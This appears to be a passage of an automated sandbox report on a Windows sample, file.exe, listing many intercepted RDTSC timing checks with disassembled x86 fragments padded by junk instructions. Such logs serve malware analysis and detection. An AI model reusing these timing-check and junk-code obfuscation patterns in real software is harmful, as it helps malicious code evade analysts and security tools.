Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA3349 second address: DA334E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA334E second address: DA3373 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1BE47673D8h 0x0000000c je 00007F1BE47673C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA615C second address: DA6162 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA6162 second address: DA6166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA6342 second address: DA6346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA7920 second address: DA793C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F1BE47673D7h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA793C second address: DA794E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F1BE4ECC066h 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA9119 second address: DA9123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA9123 second address: DA9129 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DA9129 second address: DA912F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: DAB0A2 second address: DAB0B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F1BE4ECC066h 0x0000000a jnp 00007F1BE4ECC066h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534002E second address: 534006D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F1BE47673D1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1BE47673CDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 534006D second address: 5340073 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340073 second address: 5340077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340077 second address: 53400A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F1BE4ECC06Fh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F1BE4ECC070h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53400A5 second address: 53400AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53400AB second address: 53400B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330043 second address: 5330052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330052 second address: 53300BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, 0703h 0x0000000f mov cx, 105Fh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007F1BE4ECC072h 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007F1BE4ECC06Dh 0x00000025 xor esi, 3389A336h 0x0000002b jmp 00007F1BE4ECC071h 0x00000030 popfd 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53300BB second address: 53300C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE47673CAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53300C9 second address: 53300CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 537010D second address: 5370113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53000F7 second address: 5300145 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F1BE4ECC072h 0x00000008 adc eax, 5AF0B3F8h 0x0000000e jmp 00007F1BE4ECC06Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b movsx edx, cx 0x0000001e pushfd 0x0000001f jmp 00007F1BE4ECC06Ch 0x00000024 sbb ch, 00000058h 0x00000027 jmp 00007F1BE4ECC06Bh 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5300145 second address: 53001B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, E9h 0x00000005 pushfd 0x00000006 jmp 00007F1BE47673D0h 0x0000000b adc si, 18B8h 0x00000010 jmp 00007F1BE47673CBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d call 00007F1BE47673D2h 0x00000022 pop esi 0x00000023 pushfd 0x00000024 jmp 00007F1BE47673CBh 0x00000029 and ah, 0000002Eh 0x0000002c jmp 00007F1BE47673D9h 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53001B0 second address: 53001C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC06Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53001C0 second address: 53001C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53001C4 second address: 5300240 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F1BE4ECC079h 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push esi 0x00000014 mov bx, 0A9Eh 0x00000018 pop edi 0x00000019 jmp 00007F1BE4ECC074h 0x0000001e popad 0x0000001f push dword ptr [ebp+04h] 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F1BE4ECC06Eh 0x00000029 add si, 1C98h 0x0000002e jmp 00007F1BE4ECC06Bh 0x00000033 popfd 0x00000034 mov dh, ch 0x00000036 popad 0x00000037 push dword ptr [ebp+0Ch] 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F1BE4ECC06Eh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320D05 second address: 5320D0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320D0A second address: 5320D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F1BE4ECC06Dh 0x0000000a adc ax, 6A66h 0x0000000f jmp 00007F1BE4ECC071h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a call 00007F1BE4ECC06Ch 0x0000001f mov ebx, ecx 0x00000021 pop ecx 0x00000022 call 00007F1BE4ECC077h 0x00000027 mov ebx, esi 0x00000029 pop esi 0x0000002a popad 0x0000002b push eax 0x0000002c pushad 0x0000002d popad 0x0000002e xchg eax, ebp 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 mov ch, dl 0x00000034 mov cx, 0E2Dh 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320D70 second address: 5320D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE47673D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532075C second address: 5320777 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BE4ECC077h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320777 second address: 53207A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F1BE47673D2h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F1BE47673CAh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53207A3 second address: 53207A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53207A7 second address: 53207AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53207AD second address: 53207CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov bx, 4DD0h 0x00000012 movsx ebx, cx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320672 second address: 5320678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320678 second address: 53206CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F1BE4ECC06Eh 0x00000011 jmp 00007F1BE4ECC075h 0x00000016 popfd 0x00000017 mov ch, ABh 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F1BE4ECC074h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53206CD second address: 53206DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53206DC second address: 5320720 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 16ABB79Ah 0x00000008 mov dh, B3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F1BE4ECC06Ah 0x00000013 mov ebp, esp 0x00000015 jmp 00007F1BE4ECC070h 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F1BE4ECC077h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320333 second address: 5320337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320337 second address: 532033D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532033D second address: 5320343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320343 second address: 5320347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320347 second address: 532034B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532034B second address: 532035A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532035A second address: 5320370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320370 second address: 532039E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F1BE4ECC076h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532039E second address: 53203BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533030E second address: 5330312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330312 second address: 533033F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b call 00007F1BE47673D0h 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 533033F second address: 533037E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b mov ebx, 5E5558D0h 0x00000010 mov bh, 31h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 jmp 00007F1BE4ECC06Eh 0x0000001b push ecx 0x0000001c call 00007F1BE4ECC071h 0x00000021 pop ecx 0x00000022 pop edi 0x00000023 popad 0x00000024 pop ebp 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53403B9 second address: 5340400 instructions: 0x00000000 rdtsc 0x00000002 mov ch, C4h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F1BE47673CFh 0x0000000c and ecx, 0259A61Eh 0x00000012 jmp 00007F1BE47673D9h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F1BE47673CDh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340400 second address: 5340489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov si, bx 0x0000000e mov dx, A0DEh 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F1BE4ECC06Bh 0x0000001b jmp 00007F1BE4ECC073h 0x00000020 popfd 0x00000021 mov dx, si 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F1BE4ECC072h 0x0000002c mov eax, dword ptr [ebp+08h] 0x0000002f jmp 00007F1BE4ECC070h 0x00000034 and dword ptr [eax], 00000000h 0x00000037 jmp 00007F1BE4ECC070h 0x0000003c and dword ptr [eax+04h], 00000000h 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340489 second address: 53404A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532054C second address: 5320552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320552 second address: 5320574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, EEh 0x0000000d push eax 0x0000000e push edx 0x0000000f mov bx, D12Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320574 second address: 532059B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC075h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d movzx ecx, di 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 mov cx, 5951h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 532059B second address: 53205BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1BE47673D4h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53205BB second address: 53205BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53205BF second address: 53205C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53205C5 second address: 5320618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov esi, 1AA1E0DDh 0x00000011 pushad 0x00000012 mov ch, EEh 0x00000014 pushfd 0x00000015 jmp 00007F1BE4ECC075h 0x0000001a and cx, AB26h 0x0000001f jmp 00007F1BE4ECC071h 0x00000024 popfd 0x00000025 popad 0x00000026 popad 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5320618 second address: 532062B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE47673CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330E9B second address: 5330E9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330E9F second address: 5330EA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330EA5 second address: 5330F00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC071h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, AF23h 0x0000000f pushad 0x00000010 mov cl, 5Ah 0x00000012 pushfd 0x00000013 jmp 00007F1BE4ECC06Bh 0x00000018 sub eax, 23763C4Eh 0x0000001e jmp 00007F1BE4ECC079h 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F1BE4ECC06Ch 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330F00 second address: 5330F06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330F06 second address: 5330F0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5330F0A second address: 5330F36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d movsx edi, cx 0x00000010 popad 0x00000011 mov cl, 1Eh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 jmp 00007F1BE47673CFh 0x0000001b pop ebp 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f movzx esi, bx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53401FA second address: 5340209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340209 second address: 5340252 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1BE47673D5h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 jmp 00007F1BE47673CEh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F1BE47673D7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5340252 second address: 534027B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov edi, 22510E96h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F1BE4ECC078h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360699 second address: 536069F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536069F second address: 53606A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53606A3 second address: 53606A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53606A7 second address: 53606C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F1BE4ECC06Bh 0x00000011 pop eax 0x00000012 movsx edi, cx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53606C3 second address: 53606C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53606C9 second address: 5360764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F1BE4ECC079h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F1BE4ECC06Eh 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F1BE4ECC06Eh 0x0000001d adc cx, C2D8h 0x00000022 jmp 00007F1BE4ECC06Bh 0x00000027 popfd 0x00000028 jmp 00007F1BE4ECC078h 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007F1BE4ECC06Bh 0x00000034 xchg eax, ecx 0x00000035 pushad 0x00000036 movzx eax, bx 0x00000039 push ebx 0x0000003a movzx ecx, dx 0x0000003d pop edx 0x0000003e popad 0x0000003f mov eax, dword ptr [76FA65FCh] 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F1BE4ECC06Eh 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5360764 second address: 536076A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 536076A second address: 53607D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BE4ECC06Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b jmp 00007F1BE4ECC070h 0x00000010 je 00007F1C56A8F23Eh 0x00000016 pushad 0x00000017 mov di, ax 0x0000001a push esi 0x0000001b pushfd 0x0000001c jmp 00007F1BE4ECC079h 0x00000021 xor al, 00000046h 0x00000024 jmp 00007F1BE4ECC071h 0x00000029 popfd 0x0000002a pop ecx 0x0000002b popad 0x0000002c mov ecx, eax 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F1BE4ECC06Ah 0x00000035 rdtsc
